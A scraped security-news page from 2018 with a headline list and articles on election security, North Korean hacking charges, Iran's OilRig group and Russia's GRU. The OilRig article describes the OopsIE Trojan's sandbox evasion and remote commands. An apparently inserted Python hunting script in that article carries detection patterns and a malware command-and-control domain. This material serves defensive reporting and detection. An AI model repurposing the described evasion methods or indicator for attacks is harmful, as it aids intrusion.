- BigBrothers -

Last update 09.10.2017 13:51:26




Germany’s BSI chief says ‘No Evidence’ of Huawei spying
U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit
AP Exclusive: Iran Hackers Hunt Nuke Workers, US Officials | BigBrothers | Securityweek
Secure Critical Infrastructure Top of Mind for U.S.
French foreign ministry announced its Travel Alert Registry Hack
Russia-Linked Phishing Attacks Hit Government Agencies on Four Continents
U.S. Believes Chinese Intelligence Behind Marriott Hack | BigBrothers | Securityweek
Super Micro: No Malicious Hardware Found on Motherboards | BigBrothers | Securityweek
Guidelines for assessing ISPs’ security measures in the context of net neutrality
Hacking democracy efforts continue with upticks in malware deployments
Super Micro Says Its Gear Wasn’t Bugged By Chinese Spies
Russian Critical Infrastructure Targeted by Profit-Driven Cybercriminals | BigBrothers | Securityweek
Australia Anti-Encryption Law Rushed to Passage | BigBrothers | Securityweek
Australia Anti-Encryption Law Triggers Sweeping Backlash
Under Fire Huawei Agrees to UK Security Demands: Report | BigBrothers | Securityweek
EU Should Worry About Huawei, Other Chinese Firms: Official | BigBrothers | Securityweek
North Korea-linked Hackers Target Academic Institutions | BigBrothers | Securityweek
Australia Passes Anti-Encryption Bill—Here's Everything You Need To Know | BigBrothers | Thehackernews
Arrest of Tech Exec Signals Tougher US Stand on China Tech Firms | BigBrothers | Securityweek
Chinese Government Suspected in Marriott Hack: Report | BigBrothers | Securityweek
6.12.18 | Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems | BigBrothers | Securityaffairs
6.12.18 | Australia Passes Cyber Snooping Laws With Global Implications | BigBrothers | Securityweek
6.12.18 | UK Spy Agency Joins NSA in Sharing Zero-Day Disclosure Process | BigBrothers | Securityweek
Ukraine Accuses Russia of Cyberattack on Judiciary Systems | BigBrothers | Securityweek
White House Facial Recognition Pilot Raises Privacy Alarms
House GOP Campaign Arm Targeted by 'Unknown Entity' in 2018 | BigBrothers | Securityweek
Email accounts of top NRCC officials were hacked in 2018
National Republican Congressional Committee Hacked - Emails Exposed | BigBrothers | Bleepingcomputer
Israeli Firm Rejects Alleged Connection to Khashoggi Killing | BigBrothers | Securityweek
U.S. Military Members Catfished and Hooked for Thousands of Dollars
3.12.18 | New Zealand Security Bureau halts Spark from using Huawei 5G equipment | BigBrothers | Securityaffairs
3.12.18 | Russian Hackers Use BREXIT Lures in Recent Attacks | BigBrothers | Securityweek
3.12.18 | Kaspersky's U.S. Government Ban Upheld by Appeals Court | BigBrothers | Securityweek
3.12.18 | NATO Exercises Cyber Defences as Threat Grows | BigBrothers | Securityweek
UK's NCSC Explains How They Handle Discovered Vulnerabilities
ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
29.11.18 | Google Accused of Manipulation to Track Users
New Zealand Halts Huawei From 5G Upgrade Over Security Fears | BigBrothers
UK Parliament Seizes Confidential Facebook Documents | BigBrothers | Securityweek
Google Wants to Ensure Integrity of EU Parliamentary Elections | BigBrothers | Securityweek
Gov Committee Raises Concerns Over UK Critical Infrastructure Security
UK Parliament seized confidential Facebook docs to investigate its data protection policies.
US Government is asking allies to ban Huawei equipment
German eID Authentication Flaw Lets You Change Identity
19.11.18 | Suspected Russian Hackers Impersonate State Department Aide | BigBrothers | PBWCZ.CZ
19.11.18 | Does Not Compute: Japan Cyber Security Minister Admits Shunning PCs | BigBrothers | PBWCZ.CZ
18.11.18 | Europol, Diebold Nixdorf to Share Information on Cyber Threats | BigBrothers | PBWCZ.CZ
18.11.18 | Japanese government’s cybersecurity strategy chief has never used a computer | BigBrothers | PBWCZ.CZ
16.11.18 | OPM Security Improves, But Many Issues Still Unresolved: GAO | BigBrothers | PBWCZ.CZ
16.11.18 | Congress passes bill that create new Cybersecurity and Infrastructure Security Agency at DHS | BigBrothers | PBWCZ.CZ
Secret Charges Against Julian Assange Revealed Due to "Cut-Paste" Error
14.11.18 | State vs. Federal Privacy Laws: The Battle for Consumer Data Protection | BigBrothers, Privacy | PBWCZ.CZ
14.11.18 | 51 States Pledge Support for Global Cybersecurity Rules | BigBrothers | PBWCZ.CZ
13.11.18 | Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria | BigBrothers | PBWCZ.CZ
13.11.18 | Cyberattacks Top Risk to Business in North America, EAP, Europe: WEF | BigBrothers | PBWCZ.CZ
12.11.18 | France seeks Global Talks on Cyberspace security and a “code of good conduct” | BigBrothers | PBWCZ.CZ
9.11.18 | Snowden speaks about the role of surveillance firm NSO Group in Khashoggi murder | BigBrothers | PBWCZ.CZ
9.11.18 | Experts detailed how China Telecom used BGP hijacking to redirect traffic worldwide | BigBrothers | PBWCZ.CZ
8.11.18 | China Telecom Constantly Misdirects Internet Traffic | BigBrothers | PBWCZ.CZ
8.11.18 | U.S. Cyber Command CNMF Shares unclassified malware samples via VirusTotal | BigBrothers | PBWCZ.CZ
8.11.18 | U.S. Air Force announced Hack the Air Force 3.0, the third Bug Bounty Program | BigBrothers | PBWCZ.CZ
7.11.18 | UK Regulator Calls for Tougher Rules on Personal Data Use | BigBrothers | PBWCZ.CZ
6.11.18 | U.S. Air Force Announces Third Bug Bounty Program | BigBrothers | PBWCZ.CZ
6.11.18 | Iran Accuses Israel of Failed Cyber Attack | BigBrothers | PBWCZ.CZ
6.11.18 | Google dorks were the root cause of a catastrophic compromise of CIA’s communications | BigBrothers | PBWCZ.CZ
6.11.18 | New attack by Anonymous Italy: personal data from ministries and police have been released online | BigBrothers | PBWCZ.CZ
5.11.18 | Kemp Cites Voter Database Hacking Attempt, Gives No Evidence | BigBrothers | PBWCZ.CZ
3.11.18 | Joshua Adam Schulte, ex CIA employee, accused of continuing leaks from prison | BigBrothers | PBWCZ.CZ
3.11.18 | Top Australia Defence company Austal notifies a serious security breach | BigBrothers | PBWCZ.CZ
3.11.18 | Cyber attack exposes sensitive data about a nuclear power plant in France | BigBrothers | PBWCZ.CZ
2.11.18 | Top Australia Defence Firm Reports Serious Cyber Breach | BigBrothers | PBWCZ.CZ
2.11.18 | Qualys Acquires Container Security Firm Layered Insight | BigBrothers | PBWCZ.CZ
2.11.18 | U.S. Intel Budget Soars Under Trump | BigBrothers | PBWCZ.CZ
2.11.18 | US Accuses China, Taiwan Firms With Stealing Secrets From Chip Giant Micron | BigBrothers | PBWCZ.CZ
2.11.18 | New Bill Proposes Prison for Execs Misusing Consumer Data | BigBrothers | PBWCZ.CZ
1.11.18 | Iran hit by a more aggressive and sophisticated Stuxnet version | BigBrothers | PBWCZ.CZ
1.11.18 | 85 Millions of voter records available for sale ahead of the 18 US Midterm Elections | BigBrothers | PBWCZ.CZ
31.10.18 | UK Regulator Issues Second GDPR Enforcement Notice on Canadian Firm | BigBrothers | PBWCZ.CZ
31.10.18 | Ex-Air Force Airman in New Mexico Accused of Computer Fraud | BigBrothers | PBWCZ.CZ
31.10.18 | Proposal for Cybersecurity Civilian Corps Gets Mixed Reception | BigBrothers | PBWCZ.CZ
30.10.18 | Russian Held as Agent Studied US Groups' Cyberdefenses | BigBrothers | PBWCZ.CZ
30.10.18 | US Election Integrity Depends on Security-Challenged Firms | BigBrothers | PBWCZ.CZ
29.10.18 | The Belgacom hack was the work of the UK GCHQ intelligence agency | BigBrothers | PBWCZ.CZ
28.10.18 | Analysis of North Korea's Internet Traffic Shows a Nation Run Like a Criminal Syndicate | BigBrothers, Cyber | PBWCZ.CZ
25.10.18 | Pentagon Launches Continuous Bug Bounty Program | BigBrothers | PBWCZ.CZ
24.10.18 | Super Micro to Customers: Chinese Spy Chips Story Is Wrong | BigBrothers | PBWCZ.CZ
24.10.18 | Triton Malware Linked to Russian Government Research Institute | BigBrothers, Virus | PBWCZ.CZ
24.10.18 | To Secure Medical Devices, the FDA Turns to Ethical Hackers | BigBrothers | PBWCZ.CZ
24.10.18 | Russian Government-owned research institute linked to Triton attacks | BigBrothers | PBWCZ.CZ
23.10.18 | NATO military command center should be fully operational in 2023 | BigBrothers | PBWCZ.CZ
23.10.18 | Israel Defense Forces were searching systems to spy on private social media messages | BigBrothers | PBWCZ.CZ
22.10.18 | NSA-Linked 'DarkPulsar' Exploit Tool Detailed | BigBrothers | PBWCZ.CZ
22.10.18 | DarkPulsar and other NSA hacking tools used in hacking operations in the wild | BigBrothers | PBWCZ.CZ
21.10.18 | EU Leaders Vow Tough Action on Cyber Attacks | BigBrothers | PBWCZ.CZ
19.10.18 | 'GreyEnergy' Cyberspies Target Ukraine, Poland | BigBrothers | PBWCZ.CZ
19.10.18 | Britain Leads Calls for EU Action Against Hackers | BigBrothers | PBWCZ.CZ
18.10.18 | After 2016 Hack, Illinois Says Election System Secure | BigBrothers, Hacking | PBWCZ.CZ
18.10.18 | Russia-Linked Hackers Target Diplomatic Entities in Central Asia | BigBrothers | PBWCZ.CZ
17.10.18 | 35 million US voter records available for sale in a hacking forum | BigBrothers | PBWCZ.CZ
14.10.18 | Pentagon Reveals Cyber Breach of Travel Records | BigBrothers | PBWCZ.CZ
14.10.18 | Pentagon Defense Department travel records data breach | BigBrothers | PBWCZ.CZ
14.10.18 | Ex-NASA Contractor Pleads Guilty in Cyberstalking Scheme | BigBrothers | PBWCZ.CZ
14.10.18 | U.S. Senators Demand Internal Memo Related to Google+ Incident | BigBrothers | PBWCZ.CZ
13.10.18 | Five Eyes Intelligence agencies warn of popular hacking tools | BigBrothers | PBWCZ.CZ
12.10.18 | 'Five Eyes' Agencies Release Joint Report on Hacking Tools | BigBrothers | PBWCZ.CZ
10.10.18 | New Pentagon Weapons Systems Easily Hacked: Report | BigBrothers | PBWCZ.CZ
8.10.18 | UK, US Security Agencies Deny Investigating Chinese Spy Chips | BigBrothers | PBWCZ.CZ
8.10.18 | Russia's Hackers Long Tied to Military, Secret Services | BigBrothers | PBWCZ.CZ
8.10.18 | Man Pleads Guilty to Hacking Websites of New York City Comptroller and West Point | BigBrothers | PBWCZ.CZ
7.10.18 | Russian State-Sponsored Operations Begin to Overlap: Kaspersky | BigBrothers | PBWCZ.CZ
7.10.18 | DHS Warns of Threats to Precision Agriculture | BigBrothers | PBWCZ.CZ
7.10.18 | China Tech Stocks Lenovo, ZTE Tumble After Chip Hack Report | BigBrothers | PBWCZ.CZ
7.10.18 | Industry Reactions to Chinese Spy Chips: Feedback Friday | BigBrothers | PBWCZ.CZ
7.10.18 | West Accuses Russian Spy Agency of Scores of Attacks | BigBrothers | PBWCZ.CZ
6.10.18 | US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations | BigBrothers | PBWCZ.CZ
6.10.18 | DHS issued an alert on attacks aimed at Managed Service Providers | BigBrothers | PBWCZ.CZ
5.10.18 | Canada blames Russia for cyber attacks against its structures | BigBrothers | PBWCZ.CZ
5.10.18 | Canada Says it Was Targeted by Russian Cyber Attacks | BigBrothers | PBWCZ.CZ
5.10.18 | DHS Warns of Threats to Precision Agriculture | BigBrothers | PBWCZ.CZ
5.10.18 | China Used Tiny Chips on US Computers to Steal Secrets: Report | BigBrothers | PBWCZ.CZ
5.10.18 | China planted tiny chips on US computers for cyber espionage | BigBrothers | PBWCZ.CZ
5.10.18 | U.S. Charges 7 Russian Intel Officers as West Condemns GRU | BigBrothers | PBWCZ.CZ
5.10.18 | UK, Australia Blame Russia for Bad Rabbit, Other Attacks | BigBrothers | PBWCZ.CZ
5.10.18 | US to Let NATO Use its Cyber Defense Skills | BigBrothers | PBWCZ.CZ
4.10.18 | US offers its cyber warfare defense capabilities to NATO | BigBrothers | PBWCZ.CZ
4.10.18 | U.S. Links North Korean Government to ATM Hacks | BigBrothers | PBWCZ.CZ
4.10.18 | California Law Sets Up Fresh Legal Clash Over 'Net Neutrality' | BigBrothers | PBWCZ.CZ
2.10.18 | U.S. Energy Department Invests Another $28 Million in Cybersecurity | BigBrothers | PBWCZ.CZ
28.9.18 | EU Lawmakers Push for Cybersecurity, Data Audit of Facebook | BigBrothers | PBWCZ.CZ
27.9.18 | Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak | BigBrothers | PBWCZ.CZ
27.9.18 | Senate Committee Approves Several Cybersecurity Bills | BigBrothers | PBWCZ.CZ
27.9.18 | Senate Panel to Hear From Internet Execs on Privacy Policies | BigBrothers | PBWCZ.CZ
26.9.18 | U.S. Unveils First Step Toward New Online Privacy Rules | BigBrothers | PBWCZ.CZ
26.9.18 | Ex-NSA Hacker Sentenced to Jail Over Kaspersky Leak | BigBrothers | PBWCZ.CZ
25.9.18 | U.S. General Service Administration Launches Bug Bounty Program | BigBrothers | PBWCZ.CZ
22.9.18 | NSA-Linked 'DarkPulsar' Exploit Tool Detailed | BigBrothers | PBWCZ.CZ
22.9.18 | Lawmaker: US Senate, Staff Targeted by State-Backed Hackers | BigBrothers | PBWCZ.CZ
22.9.18 | FBI Warns of Cyber-Thieves Targeting Payroll Accounts | BigBrothers | PBWCZ.CZ
22.9.18 | Department of Defense Releases New Cyber Strategy | BigBrothers | PBWCZ.CZ
21.9.18 | US State Department confirms data breach to unclassified email system | BigBrothers | PBWCZ.CZ
20.9.18 | Nation State Cyber Attacks on Rise, Says Europol | BigBrothers | PBWCZ.CZ
20.9.18 | iOS 12 Brings Patches for 16 Security Vulnerabilities | BigBrothers | PBWCZ.CZ
17.9.18 | Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case | BigBrothers | PBWCZ.CZ
15.9.18 | Trump OKs Sanctions for Foreigners Who Meddle in Elections | BigBrothers | PBWCZ.CZ
15.9.18 | Russian Spies Arrested on Suspicion of Plans to Hack Swiss Laboratory | BigBrothers | PBWCZ.CZ
15.9.18 | German Troops Face Russian 'Hybrid War' in Lithuania: Merkel | BigBrothers | PBWCZ.CZ
14.9.18 | Greek Supreme Court Approves Russian Request for Bitcoin Suspect | BigBrothers | PBWCZ.CZ
14.9.18 | N. Korea Calls Sony, Wannacry Hack Charges Smear Campaign | BigBrothers | PBWCZ.CZ
14.9.18 | Senators Concerned About State Department's Cybersecurity Failures | BigBrothers | PBWCZ.CZ
10.9.18 | Georgia Extradites Russian Data Theft Suspect to US | BigBrothers | PBWCZ.CZ
8.9.18 | Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks | BigBrothers | PBWCZ.CZ
8.9.18 | Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US | BigBrothers | PBWCZ.CZ

Homeland Security Head: Colorado Tops US in Vote Security
8.9.18 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kirstjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among the measures she described, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. Such audits are already standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

The state has invested in new vote-tabulating machines and creates a separate paper trail for each ballot cast. Since 2013, it has required two-factor authentication for elections-systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case that the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough. Among a cascade of other problems, it would involve attempts to hack voter rolls, malware possibly planted in voting systems weeks beforehand, phishing, and social media posts claiming that systems were hacked or voters turned away. The exercise covered both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even have thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state to respond, or devise responses, to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, and responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."

Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.18 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

“The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.”

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible borders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”

Iranian Hackers Improve Recently Used Cyber Weapon
6.9.18 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual-machine capabilities, which allow it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest: the Trojan executes only if it finds the strings Iran, Arab, Arabia or Middle East in the system's time zone. These correspond to five time zones covering 10 countries, showing how narrowly the malware is targeted.

The updated Trojan variant retains most of the functionality previously associated with the threat but adds obfuscation, and it also requires the user to interact with an error dialog box (the last in the series of checks described above).

Next, the malware sleeps for two seconds, moves itself to the App Data folder and creates a scheduled task that runs a VBScript to ensure persistence; the task attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware supports several commands received from the server: run a command, write its output to a file and send that file to the server; download a file to the system; read a specified file and upload its contents; and uninstall itself.
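The persistence and C&C traits described above (a VBScript re-launched from the App Data folder by a scheduled task that fires every three minutes, and DNS resolution of the C&C domain quoted in the article) translate directly into hunt logic a defender can run over telemetry it already collects. The following is an added example, not Palo Alto Networks' code and not part of the original article: the key=value log format, field names, host names and the five-minute interval threshold are assumptions of this example, and the sample records are constructed.

```python
"""Hunt for OopsIE-style persistence and C&C indicators in constructed telemetry."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


def refang(domain: str) -> str:
    """Turn a defanged indicator such as example[.]com into a matchable name."""
    return domain.replace("[.]", ".").lower()


# C&C domain exactly as quoted (defanged) in the article.
OOPSIE_C2_DOMAINS = {refang("www.windowspatch[.]com")}

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
APPDATA_PATTERNS = (r"\\appdata\\", r"%appdata%", r"%localappdata%")
# The article says the task re-runs the Trojan every three minutes. Benign
# maintenance tasks rarely fire that often, so anything at or under this
# assumed threshold counts as a signal; tune it to your environment.
MAX_SUSPICIOUS_INTERVAL_MIN = 5


@dataclass
class TaskEvent:
    host: str
    task_name: str
    command: str
    interval_minutes: Optional[int]


def _fields(line: str) -> dict:
    """Split a constructed 'k=v;k=v' log line into a dict (assumed format)."""
    return dict(part.split("=", 1) for part in line.strip().split(";") if "=" in part)


def parse_task_event(line: str) -> TaskEvent:
    """Parse one scheduled-task creation record; an empty interval means no repeat."""
    f = _fields(line)
    interval = f.get("interval_min", "")
    return TaskEvent(
        host=f["host"],
        task_name=f["task"],
        command=f["command"],
        interval_minutes=int(interval) if interval else None,
    )


def task_is_suspicious(ev: TaskEvent) -> bool:
    """All three traits from the article must hold: a .vbs run through a Windows
    script host, launched from the user's AppData tree, on a rapid repeat trigger."""
    cmd = ev.command.lower()
    runs_vbs = ".vbs" in cmd and any(h in cmd for h in SCRIPT_HOSTS)
    from_appdata = any(re.search(p, cmd) for p in APPDATA_PATTERNS)
    rapid = ev.interval_minutes is not None and ev.interval_minutes <= MAX_SUSPICIOUS_INTERVAL_MIN
    return runs_vbs and from_appdata and rapid


def dns_hits(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (host, queried name) pairs that resolved the known C&C domain."""
    hits = []
    for line in lines:
        f = _fields(line)
        qname = f.get("qname", "").lower().rstrip(".")  # drop FQDN trailing dot
        if qname in OOPSIE_C2_DOMAINS:
            hits.append((f["host"], qname))
    return hits


def hunt(task_lines: List[str], dns_lines: List[str]) -> dict:
    """Run both detections and return what matched."""
    tasks = [parse_task_event(line) for line in task_lines]
    return {"tasks": [t for t in tasks if task_is_suspicious(t)], "dns": dns_hits(dns_lines)}


# Constructed sample telemetry, not real events. The first task mimics the
# behaviour in the article; the other two are benign tasks sharing only some traits.
TASK_LOG = [
    r'host=ws01;task=\WindowsUpdateCheck;command=wscript.exe "C:\Users\alice\AppData\Roaming\update.vbs";interval_min=3',
    r'host=ws02;task=\Microsoft\Windows\Defrag\ScheduledDefrag;command=%windir%\system32\defrag.exe -c;interval_min=',
    r'host=ws03;task=\NightlyBackup;command=cscript.exe C:\Scripts\backup.vbs;interval_min=1440',
]
DNS_LOG = [
    f"host=ws01;qname={refang('www.windowspatch[.]com')}.;qtype=A",
    "host=ws02;qname=update.microsoft.com.;qtype=A",
]

if __name__ == "__main__":
    found = hunt(TASK_LOG, DNS_LOG)
    for t in found["tasks"]:
        print(f"[task] {t.host}: {t.task_name} every {t.interval_minutes} min -> {t.command}")
    for host, name in found["dns"]:
        print(f"[dns]  {host} resolved {name}")
```

Requiring all three task traits at once keeps the rule quiet on ordinary logon scripts and nightly jobs; the DNS match is a plain indicator lookup and will stop firing as soon as the group moves infrastructure, so the behavioural rule is the one worth keeping.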

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

What's GRU? A Look at Russia's Shadowy Military Spies
6.9.18 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:


Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

